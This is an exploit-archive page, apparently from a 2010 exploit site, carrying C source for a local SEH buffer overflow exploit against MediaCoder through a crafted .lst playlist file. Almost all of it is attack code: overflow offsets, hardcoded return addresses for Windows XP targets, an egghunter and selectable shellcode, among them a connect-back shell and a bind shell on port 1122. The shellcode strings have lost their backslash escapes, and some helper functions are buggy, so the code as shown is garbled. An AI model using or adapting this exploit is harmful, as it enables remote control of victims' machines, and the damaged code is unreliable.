[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MediaCoder (.lst) file local Buffer Overflow Exploit
# Published : 2010-03-18
# Author : fl0 fl0w
# Previous Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit
# Next Title : myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
====================================================
MediaCoder (.lst) file local Buffer Overflow Exploit
====================================================
#include<stdio.h>
#include<getopt.h>
#include<string.h>
#include<windows.h>
#define PAUSE() getchar()
#define R return
#define V void
#define CONST const
#define STATIC static
#define SIZE(a) strlen(a)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define IFeq(a,b) if(a==b)
#define IFless(a,b) if(a<b)
#define IFgreat(a,b) if(a>b)
#define IFnot(a) if(!a)
#define fisier FILE
#define nul NULL
#define SPLIT(a) exit(a)
#define VER "0.7.3 build 4612 PSP edition"
#define POCNAME "MediaCoder .lst file local buffer overflow exploit"
#define AUTHOR "fl0 fl0w"
#define IFn(a,b) if(a!=b)
#define String_lengh 0x2FC
#define EIP_OFFSET 0x300
#define NOP_OFFSET 0x304
#define EGGHUNTER_OFFSET 0x318
#define JUNK_OFFSET 0x34A
#define TAG_OFFSET 0x81C
#define SHELL_OFFSET 0x824
#define NSEH_OFFSET 0x2FC
#define STOP break
#define NOP "x90x90x90x90x90"
"x90x90x90x90x90"
"x90x90x90x90x90"
"x90x90x90x90x90"
typedef char i8;
typedef short i16;
typedef int i32;
enum {True=1,False=0,Error=-1};
size_t len(const i8*);
i32 fwt(CONST V*,i32,i32,fisier*);
i32 mcpy(V*,CONST V*,i32);
i32 mset(V*,i32,i32);
i32 prinf(fisier*,CONST i8*,i8*);
i32 strcp(CONST i8*,CONST i8*);
V print(i8*);
DWORD getFsize(fisier*,i8*);
V gen_random(i8*,CONST i32);
DWORD SearchStream(CONST i8*,size_t,CONST i8*,size_t);
DWORD Findpopopret(V);
i32 stncmp(CONST i8*,CONST i8*,i32);
V help();
i32 closef(fisier*);
fisier* openf(CONST i8*,CONST i8*,fisier*);
char BeeP[]={
"x55x89xE5x83xECx18xC7x45xFC"
"x6Fx7Ax83x7C"
"xC7x44x24x04xD0x07x00x00xC7x04x24"
"x01x0Ex00x00x8Bx45xFCxFFxD0xC9xC3"
};
char ConnectBack[]={ /*ConnectBack 127.0.0.1 port 2010*/
"x31xc9xbdxcbxe3xbfxf7xb1x4fxd9xc8xd9x74x24xf4"
"x5fx31x6fx10x83xc7x04x03x6fx0cx29x16x43x1fx24"
"xd9xbcxe0x56x53x59xd1x44x07x29x40x58x43x7fx69"
"x13x01x94xfax51x8ex9bx4bxdfxe8x92x4cxeex34x78"
"x8ex71xc9x83xc3x51xf0x4bx16x90x35xb1xd9xc0xee"
"xbdx48xf4x9bx80x50xf5x4bx8fxe9x8dxeex50x9dx27"
"xf0x80x0ex3cxbax38x24x1ax1bx38xe9x79x67x73x86"
"x49x13x82x4ex80xdcxb4xaex4exe3x78x23x8fx23xbe"
"xdcxfax5fxbcx61xfcx9bxbexbdx89x39x18x35x29x9a"
"x98x9axafx69x96x57xa4x36xbbx66x69x4dxc7xe3x8c"
"x82x41xb7xaax06x09x63xd3x1fxf7xc2xecx40x5fxba"
"x48x0ax72xafxeax51x1bx1cxc0x69xdbx0ax53x19xe9"
"x95xcfxb5x41x5dxc9x42xa5x74xadxddx58x77xcdxf4"
"x9ex23x9dx6ex36x4cx76x6fxb7x99xd8x3fx17x72x98"
"xefxd7x22x70xfaxd7x1dx60x05x32x28xa7x92xc2x2b"
"x27x62x55x2ex27x63x7fxa7xc1x01x6fxeex5axbex16"
"xabx10x5fxd6x61xb0xfcx45xeex40x8ax75xb9x17xdb"
"x48xb0xfdxf1xf3x6axe3x0bx65x54xa7xd7x56x5bx26"
"x95xe3x7fx38x63xebx3bx6cx3bxbax95xdaxfdx14x54"
"xb4x57xcax3ex50x21x20x81x26x2ex6dx77xc6x9fxd8"
"xcexf9x10x8dxc6x82x4cx2dx28x59xd5x5dx63xc3x7c"
"xf6x2ax96x3cx9bxccx4dx02xa2x4ex67xfbx51x4ex02"
"xfex1exc8xffx72x0exbdxffx21x2fx94"
};
char Bindport1122[]={
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"
"x4ex36x46x52x46x32x4bx38x45x54x4ex53x4bx38x4ex37"
"x45x30x4ax57x41x30x4fx4ex4bx58x4fx54x4ax31x4bx48"
"x4fx35x42x52x41x30x4bx4ex49x34x4bx38x46x43x4bx48"
"x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
"x46x4fx4bx33x46x45x46x32x4ax32x45x37x45x4ex4bx48"
"x4fx55x46x32x41x50x4bx4ex48x56x4bx48x4ex50x4bx44"
"x4bx58x4fx45x4ex31x41x30x4bx4ex43x30x4ex32x4bx58"
"x49x38x4ex36x46x52x4ex41x41x56x43x4cx41x33x4bx4d"
"x46x56x4bx38x43x34x42x53x4bx38x42x44x4ex30x4bx48"
"x42x47x4ex51x4dx4ax4bx58x42x34x4ax30x50x45x4ax46"
"x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x56"
"x43x55x48x36x4ax36x43x33x44x33x4ax46x47x57x43x57"
"x44x43x4fx45x46x35x4fx4fx42x4dx4ax46x4bx4cx4dx4e"
"x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx55x49x58x45x4e"
"x48x46x41x38x4dx4ex4ax50x44x50x45x35x4cx56x44x30"
"x4fx4fx42x4dx4ax36x49x4dx49x50x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x55x43x45x43x45x43x35x43x35x43x44"
"x43x35x43x34x43x45x4fx4fx42x4dx48x36x4ax36x46x50"
"x44x36x48x36x43x35x49x38x41x4ex45x49x4ax36x46x4a"
"x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"
"x41x55x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"
"x49x4ex47x45x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d"
"x4ax36x45x4ex49x44x48x58x49x54x47x55x4fx4fx48x4d"
"x42x55x46x35x46x45x45x45x4fx4fx42x4dx43x49x4ax46"
"x47x4ex49x47x48x4cx49x37x47x55x4fx4fx48x4dx45x35"
"x4fx4fx42x4dx48x46x4cx46x46x46x48x36x4ax46x43x56"
"x4dx36x49x38x45x4ex4cx36x42x35x49x45x49x32x4ex4c"
"x49x38x47x4ex4cx56x46x34x49x58x44x4ex41x43x42x4c"
"x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x54x4ex52"
"x43x39x4dx58x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax56"
"x44x57x50x4fx43x4bx48x51x4fx4fx45x57x46x34x4fx4f"
"x48x4dx4bx45x47x55x44x45x41x45x41x35x41x45x4cx56"
"x41x50x41x45x41x55x45x55x41x55x4fx4fx42x4dx4ax36"
"x4dx4ax49x4dx45x30x50x4cx43x45x4fx4fx48x4dx4cx36"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx58x47x35x4ex4f"
"x43x58x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d"
"x4ax56x42x4fx4cx38x46x30x4fx35x43x35x4fx4fx48x4dx4fx4fx42x4dx5a"
};
i8 Calculator[]={
"xbax20xf0xfdx7fxc7x02x4cxaaxf8x77x33xC0x50x68x63x61x6Cx63"
"x54x5Bx50x53xB9xC7x93xC2x77xFFxD1xEBxF7"
};
i8 egghunter[]={/*IsBadReadPtr egghunter 32 bytes*/
"x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x66x6Cx30x77" //fl0w tag
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7"
};
i8 tag[]={"x66x6Cx30x77"
"x66x6Cx30x77"
};
i32 j,i,x,custom=0,err;
i8 c,shellbuffer[0x3E8],fbuffer[0xF4240],retcode[10];
DWORD ret;
i32 main(i32 argc,i8** argv)
{ ((argc==7)||(argc==8)&&(atoi(argv[4])>0)&&(atoi(argv[6])>0)&&(atoi(argv[4])<6)||(argc==8)&&(atoi(argv[7])==4))?(err=True):(err=Error);
IFeq(err,True){
((strcp(argv[1],"-f")==0)&&(len(argv[1])==2)&&(strcp(argv[3],"-s")==0)&&(len(argv[3])==2)&&(strcp(argv[5],"-t")==0)&&(len(argv[5])==2))?(err=True):(err=Error);
IFeq(err,True){
(atoi(argv[6])==1)?(mcpy(&ret,"x26x59x01x66",4)):(atoi(argv[6])==2)?(mcpy(&ret,"xB8x15xD1x72",4)):(atoi(argv[6])==3)?(mcpy(&ret,"x83x27x90x7C",4)):(atoi(argv[6])==4)?(custom=1):(custom=0);
IFeq(custom,1){
if((strncmp(argv[7],"0x",(sizeof(i8)*2))==0)&&(len(argv[7])==10)){
for(j=(sizeof(char) * 8) - 1; (j >= 0);j--) {
c = *(argv[1] + j + 2);
((c>=48)&&(c<=57)||(c>=65)&&(c<=70)||(c>=97)&&(c<=102))?(err=1):(err=-1);
}
sscanf(argv[7],"%x",&ret);
}
else
print("syntax error 0x not found");
}
}
else
print("syntax error ,target must be in range[1-4]");
}
else {
system("cls");
printf("[#]%sn[#]Ver %sn[#]Author %sn",POCNAME,VER,AUTHOR);
help();
}
switch(atoi(argv[4])){
case 1: mcpy(shellbuffer,ConnectBack,SIZE(ConnectBack));
STOP;
case 2: mcpy(shellbuffer,Bindport1122,0x2C5);
STOP;
case 3: mcpy(shellbuffer,Calculator,0x20);
STOP;
case 4: mcpy(shellbuffer,BeeP,0x13);
STOP;
}
gen_random(fbuffer,String_lengh);
mcpy(fbuffer+NSEH_OFFSET,"xEBx06x90x90",4);
mcpy(fbuffer+EIP_OFFSET,&ret,4);
mcpy(fbuffer+NOP_OFFSET,NOP,0x14);
mcpy(fbuffer+EGGHUNTER_OFFSET,egghunter,0x20);
mset(fbuffer+JUNK_OFFSET,0x58,0x4D2);
mcpy(fbuffer+TAG_OFFSET,tag,8);
mcpy(fbuffer+SHELL_OFFSET,shellbuffer,len(shellbuffer));
fisier* f=fopen(argv[2],"wb");
fwt(fbuffer,1,0x824+len(shellbuffer),f);
closef(f);
PAUSE();
print("DONE!");
printf("[!]File is %d bytes",getFsize(f,argv[2]));
R 0;
}
size_t len(CONST i8* str)
{ CONST i8* aux=str;
R SIZE(aux);
}
i32 fwt(CONST V* ptr,i32 sz,i32 elem,fisier* fname)
{ CONST V* p=ptr;
R fwrite(p,sz,elem,fname);
}
i32 mcpy(V* dest,CONST V* source,i32 len)
{ V* D=dest;
CONST* S=source;
len=SIZE(source);
memcpy(D,S,len);
R len;
}
i32 mset(V* ptr,i32 val,i32 len)
{ V* f=ptr;
i32 valoare=val;
memset(f,val,len);
R len;
}
i32 prinf(fisier* str,CONST i8* format,i8* buffer)
{ fisier* f=str;
CONST i8* fm=format;
R fprintf(f,fm,buffer);
}
i32 strcp(CONST i8* str1,CONST i8* str2)
{ CONST i8* s1=str1;
CONST i8* s2=str2;
R strcmp(s1,s2);
}
i32 stncmp(CONST i8* str1,CONST i8* str2,i32 num)
{ CONST i8* s1=str1;
CONST i8* s2=str2;
R strncmp(s1,s2,num);
}
V print(i8* msg)
{
printf("[*]%sn",msg);
}
V gen_random(i8* s,CONST i32 len)
{ i32 i;
STATIC CONST i8 alphanum[]= {
"0123456789ABCDEFGHIJKLMNOPQRST"
"UVWXYZabcdefghijklmnopqrstuvwxyz"};
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
V help()
{ i8 h[]=
"***************************************************************************n"
"* syntax: [-f<file.m3u>] [-s<shellcode>] [-t<target>] 0xFFFFFFFF *n"
"* -f filename *n"
"* -s shellcode to run [1,5] *n"
"* -t target [1,4] *n"
"* example: mediac.exe -f vuln.lst -s 2 -t 1 *n"
"* mediac.exe -f vuln.lst -s 4 0xFFFFFFFF *n"
"* Shellcode 1.ConnectBack 127.0.0.1 port 2010 *n"
"* 2.Bindport1122 *n"
"* 3.Calculator *n"
"* 4.BeeP *n"
"* Targets 1.Universal *n"
"* 2.Windows xp sp2 en kernel32.dll *n"
"* 3.Windows sp3 en ntdll.dll *n"
"* 4.Windows xp sp1 en *n"
"***************************************************************************n";
printf("%s",h);}
DWORD getFsize(fisier* g,i8* gname)
{ DWORD s;
g=fopen(gname,"rb");
IFeq(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
R s;}
i32 closef(fisier* stream)
{ fisier* f=stream;
R fclose(f);
}
# Inj3ct0r.com [2010-03-18]